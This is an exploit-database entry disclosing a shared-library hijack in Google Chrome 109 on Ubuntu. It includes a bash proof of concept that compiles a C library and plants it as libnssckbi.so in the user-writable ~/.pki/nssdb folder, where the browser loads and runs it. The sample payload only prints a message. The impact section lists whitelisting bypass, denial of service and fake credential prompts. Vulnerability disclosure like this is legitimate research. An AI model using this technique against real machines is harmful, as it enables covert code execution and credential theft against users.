Share
## https://sploitus.com/exploit?id=1337DAY-ID-38337
#Vulnerability: Google Chrome code execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on : Ubuntu 22.04.1

*Description*

Google chrome attempts to load the 'libssckbi.so' file from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Since the Shared Library 'ibnssckbi.so' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with 
the name `libnssckbi.so` in the specified path.



*exploit*

Following is the POC that could be used to reproduce the issue:

echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then

  echo "[+] Directory Exists..."
  if [ -w "/home/haalim/.pki/nssdb" ]
  then
    echo "[+] Directory is writable..."

    echo "[+] Directory is writable..."
    echo "[+] Generating malicious File libnssckbi.so ..."
      echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
      echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
      echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
      echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
      echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
      echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
      echo "}" >> /home/haalim/.pki/nssdb/exploit.c
      gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o 
      gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o 


  fi

fi

Upon closing the browser windows, the application executes the malicious code


*Impact*

The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.